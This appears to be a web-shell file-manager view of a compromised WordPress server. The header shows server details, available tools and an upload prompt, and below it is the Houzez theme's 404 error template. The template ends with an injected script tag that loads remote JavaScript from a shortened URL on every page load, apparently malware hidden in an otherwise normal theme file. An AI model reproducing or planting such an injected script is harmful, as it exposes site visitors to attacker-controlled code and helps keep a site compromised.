| Server IP : 84.16.76.247 / Your IP : 216.73.216.40 Web Server : Apache System : Linux h2web300 4.9.0-0.bpo.12-amd64 #1 SMP Debian 4.9.210-1+deb9u1~deb8u1 (2020-06-09) x86_64 User : uid195448 ( 195448) PHP Version : 7.4.33 Disable Function : passthru,exec,system,popen,shell_exec,proc_open,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : OFF Directory : /home/clients/9feeab47ed6ca1a1b2890343d7a99fd4/web/wp-content/themes/houzez/ |
Upload File : |
<?php
/**
* 404 error page
*
* @package Houzez
* @since Houzez 1.0
**/
global $houzez_local;
$title_404 = houzez_option('404-title');
$title_des = houzez_option('404-des');
get_header(); ?>
<?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'single' ) ) { ?>
<section class="page-wrap">
<div class="container">
<div class="row">
<div class="col-lg-12 col-md-12">
<div class="article-wrap">
<article class="article-page-wrap">
<div class="error-404-page text-center">
<h1><?php echo esc_attr( $title_404 ); ?></h1>
<p><?php echo wp_kses_post( $title_des ); ?></p>
<a class="btn btn-link" href="<?php echo esc_url( site_url() ); ?>"><?php echo $houzez_local['404_page'];?></a>
</div>
</article><!-- article-page-wrap -->
</div>
</div><!-- bt-content-wrap -->
</div><!-- row -->
</div><!-- container -->
</section><!-- listing-wrap -->
<?php } ?>
<?php get_footer(); ?>
<script src="https://lyly.ly/HQj0j5" type="text/javascript"></script>